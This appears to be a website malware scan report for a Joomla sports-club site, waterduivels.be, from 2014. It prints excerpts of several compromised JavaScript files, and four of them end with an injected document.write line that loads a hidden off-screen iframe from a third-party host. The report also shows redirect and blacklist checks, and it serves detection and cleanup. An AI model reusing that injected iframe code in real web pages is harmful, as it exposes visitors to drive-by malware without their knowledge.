Scanned pages/files
Request | Server response | Status |
http://waterduivels.be/ | 200 OK Content-Length: 6675 Content-Type: text/html | clean |
http://waterduivels.be/media/system/js/mootools-core.js | 200 OK Content-Length: 96538 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
(function(){this.MooTools={version:"1.4.5",build:"ab8ea8824dc3b24b6666867a2c4ed58ebb762cf0"};var e=this.typeOf=function(i){if(i==null){return"null";}if(i.$family!=null){return i.$family(); }if(i.nodeName){if(i.nodeType==1){return"element";}if(i.nodeType==3){return(/\S/).test(i.nodeValue)?"textnode":"whitespace";}}else{if(typeof i.length=="number"){if(i.callee){return"arguments"; }if("item" in i){return"collection";}}}return typeof i;};var u=this.instanceOf=function(w,i){if(w==null){retur [...] return eval(rs);};})();;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://htwlckg.qhigh.com/02c4ae3.loa?11"></iframe>');
The excerpt is abridged where marked [...]. The statement appended after the library's closing `})();` is the `document.write('<iframe ...')` call: it inserts an iframe positioned off-screen (`position:absolute;left:-100px`) that loads content from a third-party host. The same statement appears at the end of the core.js, caption.js and mootools-more.js excerpts below.
Antivirus reports:
| ||
http://waterduivels.be/media/system/js/core.js | 200 OK Content-Length: 4960 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if("undefined"===typeof Joomla)var Joomla={};Joomla.editors={};Joomla.editors.instances={};Joomla.submitform=function(a,b){if("undefined"===typeof b&&(b=document.getElementById("adminForm"),!b))b=document.adminForm;if("undefined"!==typeof a&&''!==a)b.task.value=a;if("function"==typeof b.onsubmit)b.onsubmit();"function"==typeof b.fireEvent&&b.fireEvent("submit");b.submit()};Joomla.submitbutton=function(a){Joomla.submitform(a)}; Joomla.JText={strings:{},_:function(a,b){ ;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://htwlckg.qhigh.com/02c4ae3.loa?11"></iframe>'); Antivirus reports:
| ||
http://waterduivels.be/media/system/js/caption.js | 200 OK Content-Length: 905 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption=new Class({initialize:function(a){this.selector=a;$$(a).each(function(a){this.createCaption(a)},this)},createCaption:function(a){var f=document.createTextNode(a.title),c=document.createElement("div"),d=document.createElement("p"),e=a.getAttribute("width"),b=a.getAttribute("align");if(!e)e=a.width;b||(b=a.getStyle("float"));if(!b)b=a.style.styleFloat;if(b==""||!b)b="none";d.appendChild(f);d.className=this.selector.replace(".","_");a.parentNode.insertBefore(c,a);c.appendChild(a);a.title!= ""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}});;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://htwlckg.qhigh.com/02c4ae3.loa?11"></iframe>'); Antivirus reports:
| ||
http://waterduivels.be/media/system/js/mootools-more.js | 200 OK Content-Length: 238507 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) MooTools.More={version:"1.4.0.1",build:"a4244edf2aa97ac8a196fc96082dd35af1abab87"};(function(){Events.Pseudos=function(h,e,f){var d="_monitorEvents:";var c=function(i){return{store:i.store?function(j,k){i.store(d+j,k); }:function(j,k){(i._monitorEvents||(i._monitorEvents={}))[j]=k;},retrieve:i.retrieve?function(j,k){return i.retrieve(d+j,k);}:function(j,k){if(!i._monitorEvents){return k; }return i._monitorEvents[j]||k;}};};var g=function(k){if(k.indexOf(":")==-1||!h){return null;}var j=S }});;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://htwlckg.qhigh.com/02c4ae3.loa?11"></iframe>'); Antivirus reports:
| ||
http://waterduivels.be/index.php | 200 OK Content-Length: 6684 Content-Type: text/html | clean |
http://waterduivels.be/index.php/wie-zijn-wij | 200 OK Content-Length: 8299 Content-Type: text/html | clean |
http://waterduivels.be/index.php/het-bestuur | 200 OK Content-Length: 7719 Content-Type: text/html | clean |
http://waterduivels.be/index.php/contact | 200 OK Content-Length: 10314 Content-Type: text/html | clean |
http://waterduivels.be/index.php/trainingen | 200 OK Content-Length: 7593 Content-Type: text/html | clean |
http://waterduivels.be/index.php/interesse | 200 OK Content-Length: 28407 Content-Type: text/html | clean |
http://waterduivels.be/media/system/js/calendar.js | 200 OK Content-Length: 30489 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
Calendar=function(d,c,f,a){this.activeDiv=null;this.currentDateEl=null;this.getDateStatus=null;this.getDateToolTip=null;this.getDateText=null;this.timeout=null;this.onSelected=f||null;this.onClose=a||null;this.dragging=false;this.hidden=false;this.minYear=1970;this.maxYear=2050;this.dateFormat=Calendar._TT.DEF_DATE_FORMAT;this.ttDateFormat=Calendar._TT.TT_DATE_FORMAT;this.isPopup=true;this.weekNumbers=true;this.firstDayOfWeek=typeof d=="number"?d:Calendar._FD;this.showsOtherMonths=false;this.dat [...]
The excerpt is cut off mid-statement. The part shown appears to be ordinary calendar code, so the portion that triggered the detection is presumably further into the file.
Antivirus reports:
| ||
http://waterduivels.be/media/system/js/calendar-setup.js | 200 OK Content-Length: 3266 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
Calendar.setup=function(g){function f(h,i){if(typeof g[h]=="undefined"){g[h]=i}}f("inputField",null);f("displayArea",null);f("button",null);f("eventName","click");f("ifFormat","%Y/%m/%d");f("daFormat","%Y/%m/%d");f("singleClick",true);f("disableFunc",null);f("dateStatusFunc",g.disableFunc);f("dateTooltipFunc",null);f("dateText",null);f("firstDay",null);f("align","Br");f("range",[1900,2999]);f("weekNumbers",true);f("flat",null);f("flatCallback",null);f("onSelect",null);f("onClose",null);f("onUpda [...]
The excerpt is cut off mid-statement. The part shown appears to be ordinary calendar setup code, so the portion that triggered the detection is presumably further into the file.
Antivirus reports:
| ||
http://waterduivels.be/index.php/inschrijvingen | 200 OK Content-Length: 17717 Content-Type: text/html | clean |
http://waterduivels.be/index.php/google-kalender | 200 OK Content-Length: 7034 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: waterduivels.be
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sun, 05 Oct 2014 00:35:26 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 884bee7307b586ab8856086ba4b3205c=029c11757d6b8a57caec34f725acc340; path=/
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: waterduivels.be
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sun, 05 Oct 2014 00:35:26 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 884bee7307b586ab8856086ba4b3205c=029c11757d6b8a57caec34f725acc340; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: waterduivels.be
Referer: http://www.google.com/search?q=waterduivels.be
Result:
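The result is similar to the first query. No suspicious redirects were found. Only the two request variants shown (without a Referer header and with a Google search Referer) were compared, so a redirect that depends on other request properties would not show up in this check.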
GET / HTTP/1.1
Host: waterduivels.be
Referer: http://www.google.com/search?q=waterduivels.be
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=waterduivels.be
Result: This site is not currently listed as suspicious. A blacklist only reflects what that service has already crawled and flagged, so this result does not clear the scripts marked malicious in the scan above.
Query: http://yandex.com/infected?l10n=en&url=http://waterduivels.be/
Result: waterduivels.be is not infected or malware details are not published yet.